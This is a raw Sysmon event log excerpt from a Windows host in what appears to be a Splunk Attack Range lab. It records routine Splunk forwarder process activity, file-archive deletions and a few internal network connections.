13:14:37.898{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496867Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:37.898{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496866Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:37.898{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A03D-6140-6B56-04000000C801}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496865Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:37.898{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A03D-6140-6B56-04000000C801}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496864Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:37.892{B81B27B7-A03D-6140-6B56-04000000C801}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496884Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:38.896{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7B7F011091BDE397317776910760C7D5,SHA256=A023471DBB25FDCA43ED71EB514EBF968E988C5AD36C6B628B58F2F12D6EBD73,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496883Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:38.895{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=860A1C50849D3838B601B34C994791A5,SHA256=887887ACDA7E1F73351E0DDED7B0DE1B5BD955935223B3DAF1B2796C13606B0C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496882Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:38.776{B81B27B7-A03E-6140-6C56-04000000C801}24606712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496881Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:38.595{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A03E-6140-6C56-04000000C801}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496880Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:38.593{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496879Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:38.593{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496878Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:38.592{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496877Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:38.592{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496876Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:38.592{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A03E-6140-6C56-04000000C801}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496875Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:38.592{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A03E-6140-6C56-04000000C801}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496874Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:38.576{B81B27B7-A03E-6140-6C56-04000000C801}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036496873Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:38.060{B81B27B7-A03D-6140-6B56-04000000C801}67245320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000036496894Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:09.873{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50469-false10.0.1.12-8000- 10341000x800000000000000036496893Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:39.275{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A03F-6140-6D56-04000000C801}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496892Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:39.275{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496891Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:39.275{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496890Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:39.275{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496889Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:39.275{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496888Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:39.275{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A03F-6140-6D56-04000000C801}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496887Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:39.275{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A03F-6140-6D56-04000000C801}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496886Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:39.260{B81B27B7-A03F-6140-6D56-04000000C801}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496885Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:39.012{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAAAE4C0B28DDBBB01566C5BA68E5AE0,SHA256=39A2ACE793D4111579720BD26172A871EC93F7BAFA98FE2BACEE3AF79047BE3E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496897Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:40.292{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7B7F011091BDE397317776910760C7D5,SHA256=A023471DBB25FDCA43ED71EB514EBF968E988C5AD36C6B628B58F2F12D6EBD73,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496896Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:40.058{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5D11A35B6EBBA5CBC70B25A3467F5A79,SHA256=5D6210FA565DB19718E60A7079A008F44A3673B561A2F1CB785810F6A580247C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496895Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:40.042{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6580E76E111FED67B6D4ABCB2797BA8,SHA256=4941AB28C6807720844417E6ED1962ADA6852BA0967F156DAD93D68F7F1D6F18,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496899Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:41.073{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1D7D6BC3EAFE511D50630261B9A91AC,SHA256=FABF3D1A30263C3F4983A2C7F58B3493DE08C2734D2064D4D2D56DF295C4D7F8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496898Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:10.511{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50470-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496900Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:42.089{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33C7EF511EB1C4504C6C0A0C7E139900,SHA256=9358817E10BC98DE3E76F1805D692CC9B166D194D7D71621AA6FDD46B7EC047F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496901Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:43.108{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 